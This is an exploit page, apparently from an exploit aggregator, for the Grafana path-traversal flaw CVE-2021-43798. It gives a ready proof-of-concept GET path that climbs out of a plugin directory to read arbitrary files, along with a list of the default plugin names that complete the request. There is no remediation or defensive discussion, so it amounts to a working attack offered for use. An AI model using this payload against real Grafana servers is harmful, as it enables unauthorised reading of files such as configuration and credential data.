Exploit for Path Traversal in Grafana CVE-2021-43798

## https://sploitus.com/exploit?id=A57305C4-E69A-5186-9373-04CE79F40296
# Grafana-CVE-2021-43798
Grafana File-Read    影响版本：8.0.0-lastest

![图片](https://user-images.githubusercontent.com/57030243/145164498-511a297f-f26a-4517-a2b4-0fd2e22ae95d.png)

# Poc-http-get 
/public/plugins/{plugins-lst}/../../../../../../../../{filename}
# Default plugins-lst
```
alertlist
annolist
grafana-azure-monitor-datasource
barchart
bargauge
cloudwatch
dashlist
elasticsearch
gauge
geomap
gettingstarted
stackdriver
graph
graphite
heatmap
histogram
influxdb
jaeger
logs
loki
mssql
mysql
news
nodeGraph
opentsdb
piechart
pluginlist
postgres
prometheus
stat
state-timeline
status-history
table
table-old
tempo
testdata
text
timeseries
welcome
zipkin
```